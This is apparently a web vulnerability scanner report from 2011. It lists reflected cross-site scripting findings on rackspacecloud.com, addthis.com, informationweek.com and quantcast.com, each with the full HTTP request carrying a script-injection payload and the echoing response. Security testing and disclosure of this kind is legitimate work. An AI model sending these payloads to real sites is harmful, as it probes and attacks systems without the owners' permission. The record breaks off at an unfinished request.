GET /legal/privacystatement/?20633"><script>alert(1)</script>c63c78bd6fc=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 50676
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.215. http://www.rackspacecloud.com/managed_cloud/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/managed_cloud/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeae6"><script>alert(1)</script>10afadf6183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /managed_cloud/?eeae6"><script>alert(1)</script>10afadf6183=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 46000
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.216. http://www.rackspacecloud.com/partners/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/partners/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d84"><script>alert(1)</script>07640ec1bd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /partners/?56d84"><script>alert(1)</script>07640ec1bd2=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 32377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.217. http://www.rackspacecloud.com/resellers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/resellers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a865c"><script>alert(1)</script>c89f16ef61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resellers/?a865c"><script>alert(1)</script>c89f16ef61=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 34724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the c64ff%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E96b4d784cb2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1bd"><script>alert(1)</script>0e717051f60 was submitted in the c64ff%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E96b4d784cb2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.219. http://www.rackspacecloud.com/searchresults.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/searchresults.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c64ff"><script>alert(1)</script>96b4d784cb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /searchresults.php?c64ff"><script>alert(1)</script>96b4d784cb2=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; s_cc=true; IS3_History=1296860233-1-2_4--1+6--1__4-6_; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.1.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:18:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 32647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.220. http://www.rackspacecloud.com/what_is_cloud_computing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/what_is_cloud_computing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75999"><script>alert(1)</script>47d8e74dabb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /what_is_cloud_computing?75999"><script>alert(1)</script>47d8e74dabb=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 35614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/what_is_cloud_computing/?75999"><script>alert(1)</script>47d8e74dabb=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.221. http://www.rackspacecloud.com/what_is_cloud_computing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/what_is_cloud_computing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71657"><script>alert(1)</script>4fc15ec64f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /what_is_cloud_computing/?71657"><script>alert(1)</script>4fc15ec64f7=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 35531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.222. http://www.rackspacecloud.com/who_uses_cloud_computing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspacecloud.com
Path:
/who_uses_cloud_computing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51403"><script>alert(1)</script>cc246efdae8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /who_uses_cloud_computing/?51403"><script>alert(1)</script>cc246efdae8=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 34318
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcf42"><script>alert(1)</script>adfbb7714d1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /signup HTTP/1.1 Host: signup.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fcf42"><script>alert(1)</script>adfbb7714d1 Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Mosso Engineering) Content-Type: text/html; charset=utf-8 Date: Sat, 05 Feb 2011 15:25:28 GMT Keep-Alive: timeout=15, max=147 Connection: close Set-Cookie: symfony=88a23bcrc8d9v8c9oo6utubr81; path=/ X-Powered-By: PHP/5.2.6 Content-Length: 17055
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="windows"> <head> <meta ...[SNIP]... partment + '/&fname=Cloud%20Customer&email=a@a.com&optionaldata2=/signup&optionaldata3=cleanEntry&optionaldata4=&optionaldata5=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fcf42"><script>alert(1)</script>adfbb7714d1&optionaldata6=88a23bcrc8d9v8c9oo6utubr81','custclient','width=460,height=300,scrollbars=0'); return false;"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 700c6"><script>alert(1)</script>5f2ad04cb20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=700c6"><script>alert(1)</script>5f2ad04cb20
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:52:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 94422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=700c6"><script>alert(1)</script>5f2ad04cb20" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 85a7e<script>alert(1)</script>8db0524e6be was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=85a7e<script>alert(1)</script>8db0524e6be
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:52:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 94408
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>85a7e<script>alert(1)</script>8db0524e6be - Google search</h4> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c986f"-alert(1)-"f27af4be1f0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c986f"-alert(1)-"f27af4be1f0 Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=EREHQTX3EON1DQE1GHPCKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32479
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b9ef"-alert(1)-"e3d87d3db3a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/hosted/showArticle.jhtml?articleID=225700573&subSection=Hosted+Software HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6b9ef"-alert(1)-"e3d87d3db3a Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:27:04 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:27:04 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=A23Z2BIMZ5AARQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 86561
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... 00 | Software as a Service | Wireless | Enterprise Software | Windows/Microsoft"; s.prop6=""; s.prop7="Charles Babcock"; s.prop8="173.193.214.243 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6b9ef"-alert(1)-"e3d87d3db3a"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 765dc"><script>alert(1)</script>c0dd253219a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p-c0xFC9HiPwWw- HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=765dc"><script>alert(1)</script>c0dd253219a
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Date: Sat, 05 Feb 2011 16:11:30 GMT Expires: Fri, 04 Feb 2011 04:11:31 GMT Cache-control: private, max-age=0 Set-Cookie: qcVisitor=0|48|1296922291126|0|NOTSET; Expires=Mon, 28-Jan-2041 16:11:31 GMT; Path=/ Set-Cookie: JSESSIONID=227D5B23207911CA074C31589EE08010; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec9b"><script>alert(1)</script>da8f62fc3cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
